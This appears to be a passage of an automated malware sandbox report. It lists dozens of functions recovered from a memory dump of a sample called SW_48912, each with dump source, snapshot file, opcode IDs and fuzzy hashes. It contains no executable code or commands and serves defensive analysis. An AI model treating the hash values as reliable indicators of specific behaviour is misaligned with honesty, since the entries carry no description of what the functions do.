                                                                                                                      Function 013E0750 Relevance: .0, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                      • Instruction ID: 3e3ed896c284b768e93881b6688360dff22dbba10170663cacd677848c24688f
                                                                                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                      • Instruction Fuzzy Hash: D5C04879702A428FCF16DB2ED294F4A77E4FB88744F150890E905DBB22E624E801CA10
                                                                                                                      Function 01424340 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 19e80cabd889b4c04940b3c963864b793c924e3317231c66fe4bd4da5915007f
                                                                                                                      • Instruction ID: 69c590a9c44920f236293ee1d4c06d15e05e5c1cf74eafb4be94e0672d66c2a6
                                                                                                                      • Opcode Fuzzy Hash: 19e80cabd889b4c04940b3c963864b793c924e3317231c66fe4bd4da5915007f
                                                                                                                      • Instruction Fuzzy Hash: 18900231605801129140715848845468015A7F4301B55C112F0428555CCB248A576361
                                                                                                                      Function 01424650 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 30bced94cbc2505ea376cf6cf78354b76cce93d0a9b888aa34bba8ab42df4454
                                                                                                                      • Instruction ID: f8abecd3445c4f4955a34f819a006587d6ce9b492aae137dcbc9dedeb2feeb25
                                                                                                                      • Opcode Fuzzy Hash: 30bced94cbc2505ea376cf6cf78354b76cce93d0a9b888aa34bba8ab42df4454
                                                                                                                      • Instruction Fuzzy Hash: FF90026160150142414071584804406A015A7F5301395C216B0558561CC7288956A369
                                                                                                                      Function 01422BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f778b6bb3fb22bf64a6bab764e1cdc0ac667b919deb2a2e96e004abd13601787
                                                                                                                      • Instruction ID: 8903cc4c73dc2c0898de3018ef0875d595758e46040844eb68ebbf4c0b516668
                                                                                                                      • Opcode Fuzzy Hash: f778b6bb3fb22bf64a6bab764e1cdc0ac667b919deb2a2e96e004abd13601787
                                                                                                                      • Instruction Fuzzy Hash: BD90023120544942D14071584404A46402597E4305F55C112B0068695DD7358E56B761
                                                                                                                      Function 01422BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6fa1862f6f73bc7b88701fddbff5e8f50d2ebcbe4826054285a63210e36afead
                                                                                                                      • Instruction ID: 28ebfb8b88bd57ee2a1ad15e7383e8e95e4e2f268f74eb741dc159636ddc5146
                                                                                                                      • Opcode Fuzzy Hash: 6fa1862f6f73bc7b88701fddbff5e8f50d2ebcbe4826054285a63210e36afead
                                                                                                                      • Instruction Fuzzy Hash: 3E90023120140902D1807158440464A401597E5301F95C116B0029655DCB258B5A77A1
                                                                                                                      Function 01422B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 13514f6c0d176fcaa914c8bbd7274d5b554d020aec8b29999315347730566ec2
                                                                                                                      • Instruction ID: 7430c19b19d8ed4688abee2f0d9c2097cb3073351078376a4f1123b83a051543
                                                                                                                      • Opcode Fuzzy Hash: 13514f6c0d176fcaa914c8bbd7274d5b554d020aec8b29999315347730566ec2
                                                                                                                      • Instruction Fuzzy Hash: E790023120140902D10471584804686401597E4301F55C112B6028656ED77589927231
                                                                                                                      Function 01422BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3c909de3138171fd38ca2ccdb1ebf60e9b3759ebabcb0250c00962552d1167b5
                                                                                                                      • Instruction ID: d714ce3de732fe5848ce540e34380a2a66dd0455487e07365727fb2bca04a1ea
                                                                                                                      • Opcode Fuzzy Hash: 3c909de3138171fd38ca2ccdb1ebf60e9b3759ebabcb0250c00962552d1167b5
                                                                                                                      • Instruction Fuzzy Hash: F190023160540902D15071584414746401597E4301F55C112B0028655DC7658B5677A1
                                                                                                                      Function 01422AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c887c343bfe8b8e935d7cad4c6adba2de27e40675fabba4f64b503ea7f21c9f3
                                                                                                                      • Instruction ID: b4b24602eff4de75b32a9a2584020c276a37e16691a9c1f26dbbc244403c584b
                                                                                                                      • Opcode Fuzzy Hash: c887c343bfe8b8e935d7cad4c6adba2de27e40675fabba4f64b503ea7f21c9f3
                                                                                                                      • Instruction Fuzzy Hash: 16900225211401030105B5580704507405697E9351355C122F1019551CD73189626221
                                                                                                                      Function 01422AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: aa460292f46ae8d78622d8eb1eab3c9de9de88f2e347555704302323b29237b0
                                                                                                                      • Instruction ID: 095b08fee13635d97f9c1557f1667492553fe8fec348cc6c81352ef639dbf739
                                                                                                                      • Opcode Fuzzy Hash: aa460292f46ae8d78622d8eb1eab3c9de9de88f2e347555704302323b29237b0
                                                                                                                      • Instruction Fuzzy Hash: 9D900225221401020145B558060450B4455A7EA351395C116F141A591CC73189666321
                                                                                                                      Function 01422AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fe90916fed09c4d5beae8cd244841ad7f4c210d5384b8068303c3962350687cb
                                                                                                                      • Instruction ID: 82796e9b5a94e9c014e7b4c54e9706a0a352edb533a7fb15c8ad7b86eeb2f13c
                                                                                                                      • Opcode Fuzzy Hash: fe90916fed09c4d5beae8cd244841ad7f4c210d5384b8068303c3962350687cb
                                                                                                                      • Instruction Fuzzy Hash: 3B9002A1201541924500B2588404B0A851597F4201B55C117F1058561CC6358952A235
                                                                                                                      Function 01422D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 85a521fcff56d28cfd55deedaffbbc0c0ff9742a17226d31fe28c368ec7c41e8
                                                                                                                      • Instruction ID: 4ac6ba9f2ea37fd31df13267f69e373afc8c23867511cec58520bc508213e7e0
                                                                                                                      • Opcode Fuzzy Hash: 85a521fcff56d28cfd55deedaffbbc0c0ff9742a17226d31fe28c368ec7c41e8
                                                                                                                      • Instruction Fuzzy Hash: 0290022120544542D10075585408A06401597E4205F55D112B1068596DC7358952B231
                                                                                                                      Function 01422D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4606da8e407edd9629e84f4c87479812112a3ee3ae9370cb3b4a2d32e7280959
                                                                                                                      • Instruction ID: eef23911ab47611092d7405d2416cd29797417d987704e45f6ae192bdd502639
                                                                                                                      • Opcode Fuzzy Hash: 4606da8e407edd9629e84f4c87479812112a3ee3ae9370cb3b4a2d32e7280959
                                                                                                                      • Instruction Fuzzy Hash: 5490022921340102D1807158540860A401597E5202F95D516B0019559CCA25896A6321
                                                                                                                      Function 01422D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9b01646c5b665e211ad6538158a5c947abd93f621d87ebf3d432f2d4c4014b94
                                                                                                                      • Instruction ID: 57b7152781c643158c65f46c2b5ab1e37b5d4470923a6130e03d42a2b8be198e
                                                                                                                      • Opcode Fuzzy Hash: 9b01646c5b665e211ad6538158a5c947abd93f621d87ebf3d432f2d4c4014b94
                                                                                                                      • Instruction Fuzzy Hash: C590022130140103D140715854186068015E7F5301F55D112F0418555CDA2589576322
                                                                                                                      Function 01422DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b00533a580defcde192c8ecd1631db5cf5aa079b94659423d3d4c5208ec1394b
                                                                                                                      • Instruction ID: a7af27706ca34f0c36aaa6ad9b77bbbb93195716eb37edaf9cae38945cdf3edd
                                                                                                                      • Opcode Fuzzy Hash: b00533a580defcde192c8ecd1631db5cf5aa079b94659423d3d4c5208ec1394b
                                                                                                                      • Instruction Fuzzy Hash: 10900221242442525545B15844045078016A7F4241795C113B1418951CC6369957E721
                                                                                                                      Function 01422DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2144c8a4df175c9004439570d9154c00ff21c57d996926025ffe6d3e1baf146c
                                                                                                                      • Instruction ID: 5754934900cedc0c8d4ffb80dbf2ac2bc831ab2e298b5336171cc2a87e148ee2
                                                                                                                      • Opcode Fuzzy Hash: 2144c8a4df175c9004439570d9154c00ff21c57d996926025ffe6d3e1baf146c
                                                                                                                      • Instruction Fuzzy Hash: 2590023124140502D141715844046064019A7E4241F95C113B0428555EC7658B57BB61
                                                                                                                      Function 01422C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5cb18bfe1aaaf106c8384fae40a5e5c384125e7b47ff5713ba7182355f060885
                                                                                                                      • Instruction ID: 57e4e0cb73980b2a62cda613dddb0950caed1914b0516f126490acaabcc7615d
                                                                                                                      • Opcode Fuzzy Hash: 5cb18bfe1aaaf106c8384fae40a5e5c384125e7b47ff5713ba7182355f060885
                                                                                                                      • Instruction Fuzzy Hash: 9590023120140942D10071584404B46401597F4301F55C117B0128655DC725C9527621
                                                                                                                      Function 01422CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86d0f8ec776e1780cd3c454a48f5ff6dffc515c132c988e43dc618b1193aeb03
                                                                                                                      • Instruction ID: d8daec56c07fe074780fecd4a22462a6d3c68bff67bb8116bcf993a9a9486220
                                                                                                                      • Opcode Fuzzy Hash: 86d0f8ec776e1780cd3c454a48f5ff6dffc515c132c988e43dc618b1193aeb03
                                                                                                                      • Instruction Fuzzy Hash: C890022160540502D14071585418706402597E4201F55D112B0028555DC7698B5677A1
                                                                                                                      Function 01422CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 277bf209df5b929001af084e4e87e940e3e49364ec2e84031f1a089b6684ad07
                                                                                                                      • Instruction ID: f6b0068d1d21a6257adc93bfdb38f34f392cee78a606adcb7d033b8b9bcc3d6f
                                                                                                                      • Opcode Fuzzy Hash: 277bf209df5b929001af084e4e87e940e3e49364ec2e84031f1a089b6684ad07
                                                                                                                      • Instruction Fuzzy Hash: 2590023120140503D10071585508707401597E4201F55D512B0428559DD76689527221
                                                                                                                      Function 01422CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 32e3652c21a832156df7b506760dd04efa3e082ddd0ea39533ca92537fe86495
                                                                                                                      • Instruction ID: bbc8e781e6cb4b576c3e8d1c3ef081826752c5f73cf8a2c267f23673c6747192
                                                                                                                      • Opcode Fuzzy Hash: 32e3652c21a832156df7b506760dd04efa3e082ddd0ea39533ca92537fe86495
                                                                                                                      • Instruction Fuzzy Hash: 9790023120140502D10075985408646401597F4301F55D112B5028556EC77589927231
                                                                                                                      Function 01422F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 186ea5e07f67ddf3c07037f16f32081d37ab059250abee0c0e528db2209e6de4
                                                                                                                      • Instruction ID: 820b671acecfd011f1c5ac23b3acc377d4c415500511d729e2b9691976424eec
                                                                                                                      • Opcode Fuzzy Hash: 186ea5e07f67ddf3c07037f16f32081d37ab059250abee0c0e528db2209e6de4
                                                                                                                      • Instruction Fuzzy Hash: E190026121140142D10471584404706405597F5201F55C113B2158555CC6398D626225
                                                                                                                      Function 01422F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 515cd9ee8ada5ed775fdc6acb9e8331828354912b3554e4539a5023e95ec3e9e
                                                                                                                      • Instruction ID: f7aba6bd0560446a9f1c66a07b210730e3d614da4ce5c149d701731df7636654
                                                                                                                      • Opcode Fuzzy Hash: 515cd9ee8ada5ed775fdc6acb9e8331828354912b3554e4539a5023e95ec3e9e
                                                                                                                      • Instruction Fuzzy Hash: E890026134140542D10071584414B064015D7F5301F55C116F1068555DC729CD537226
                                                                                                                      Function 01422FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 226f09f5fc327503db36625010d8cf21414250cada93c93aa046d192c7a7a7e9
                                                                                                                      • Instruction ID: c6c2d6975c72699ade5eb485eb3d8598e2ed1ecf2e693bfd48f5235e237dee49
                                                                                                                      • Opcode Fuzzy Hash: 226f09f5fc327503db36625010d8cf21414250cada93c93aa046d192c7a7a7e9
                                                                                                                      • Instruction Fuzzy Hash: 12900221211C0142D20075684C14B07401597E4303F55C216B0158555CCA2589626621
                                                                                                                      Function 01422F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6888c6e66454395aacec729ac6ef879c6c0cd3f2ea9eb97abe9ccb3544afd1ae
                                                                                                                      • Instruction ID: 28a054cdcb48084097455531bcc7b0defdb56be1e7ff7186cf54e0e7b7371423
                                                                                                                      • Opcode Fuzzy Hash: 6888c6e66454395aacec729ac6ef879c6c0cd3f2ea9eb97abe9ccb3544afd1ae
                                                                                                                      • Instruction Fuzzy Hash: 2790023120180502D1007158481470B401597E4302F55C112B1168556DC73589527671
                                                                                                                      Function 01422FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ce0f90b6a0d44d79c21b83fea41bfb88aac4da992c76673197aa0718e918e12e
                                                                                                                      • Instruction ID: 010f7cc22174375095b5a63a8e4468ed744e95c98ab27a1ba9171ec38c91df99
                                                                                                                      • Opcode Fuzzy Hash: ce0f90b6a0d44d79c21b83fea41bfb88aac4da992c76673197aa0718e918e12e
                                                                                                                      • Instruction Fuzzy Hash: 4D90023120180502D10071584808747401597E4302F55C112B5168556EC775C9927631
                                                                                                                      Function 01422FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: beff5565d886e36f48d22d736d623f1d867baca248355a32afc36cce66b8e394
                                                                                                                      • Instruction ID: 6be5f6d47bd6d544238e3f6151a2c1d9f8efe7cb075e9936e449a8d94af1e5d6
                                                                                                                      • Opcode Fuzzy Hash: beff5565d886e36f48d22d736d623f1d867baca248355a32afc36cce66b8e394
                                                                                                                      • Instruction Fuzzy Hash: 7C900221601401424140716888449068015BBF5211755C222B099C551DC66989666765
                                                                                                                      Function 01422E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 73bd64d2473eaa49720f2f1184a7bf4439d0aeff9810945b491164267a77b7c0
                                                                                                                      • Instruction ID: 3ee456e562620cea4b3ec44d65ed705f059f12bdcc5da6a98424762c95a7616b
                                                                                                                      • Opcode Fuzzy Hash: 73bd64d2473eaa49720f2f1184a7bf4439d0aeff9810945b491164267a77b7c0
                                                                                                                      • Instruction Fuzzy Hash: 6090022130140502D102715844146064019D7E5345F95C113F1428556DC7358A53B232
                                                                                                                      Function 01422EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d4d559d7e5ca81d47296f8ea113ebc8c1b5d428e851aa483840964e8ce5e0518
                                                                                                                      • Instruction ID: d10510971852c9e3f1b249b77a6e8535aebcef900deb677c891aa6b0a6141ee1
                                                                                                                      • Opcode Fuzzy Hash: d4d559d7e5ca81d47296f8ea113ebc8c1b5d428e851aa483840964e8ce5e0518
                                                                                                                      • Instruction Fuzzy Hash: BF90026120180503D14075584804607401597E4302F55C112B2068556ECB398D527235
                                                                                                                      Function 01422E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1534b9766bfabd94be1d283f3e420e6c5aa21386f0c6eb33c2c0e6b80e5f79a
                                                                                                                      • Instruction ID: 5589c26c9f86f35682cd484d774b9917f41f0f339c0b729193588e4b2e1ce48f
                                                                                                                      • Opcode Fuzzy Hash: e1534b9766bfabd94be1d283f3e420e6c5aa21386f0c6eb33c2c0e6b80e5f79a
                                                                                                                      • Instruction Fuzzy Hash: 2490022160140602D10171584404616401A97E4241F95C123B1028556ECB358A93B231
                                                                                                                      Function 01422EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1627a171c7c4793c9d990c5c19e6879771660bf516d9093d6eb0b599bdddb350
                                                                                                                      • Instruction ID: c004b1b69302282d93350b26fdf726ff563353ae97732dba2912cae1bfc272f6
                                                                                                                      • Opcode Fuzzy Hash: 1627a171c7c4793c9d990c5c19e6879771660bf516d9093d6eb0b599bdddb350
                                                                                                                      • Instruction Fuzzy Hash: A590027120140502D14071584404746401597E4301F55C112B5068555EC7698ED67765
                                                                                                                      Function 01423010 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
